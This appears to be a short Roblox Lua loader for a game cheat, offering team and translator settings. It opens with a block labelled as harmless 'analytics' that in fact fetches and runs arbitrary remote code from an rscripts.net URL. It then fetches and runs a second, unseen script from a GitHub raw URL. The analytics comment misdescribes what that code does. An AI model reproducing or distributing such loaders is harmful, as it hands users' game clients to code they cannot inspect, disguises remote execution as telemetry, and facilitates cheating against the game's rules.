--[[rscripts:analytics:start]] -- Script analytics (enabled by the creator on rscripts.net). -- Runs in its own thread and cannot affect the script below. task.spawn(function() pcall(function() loadstring(game:HttpGet("https://rscripts.net/api/telemetry/client.lua?s=67e7f9bebe4e460b7effe546"))() end) end) --[[rscripts:analytics:end]] local Settings = { JoinTeam = "Pirates"; -- Pirates / Marines Translator = true; -- true / false } loadstring(game:HttpGet("https://raw.githubusercontent.com/tlredz/Scripts/refs/heads/main/main.luau"))(Settings)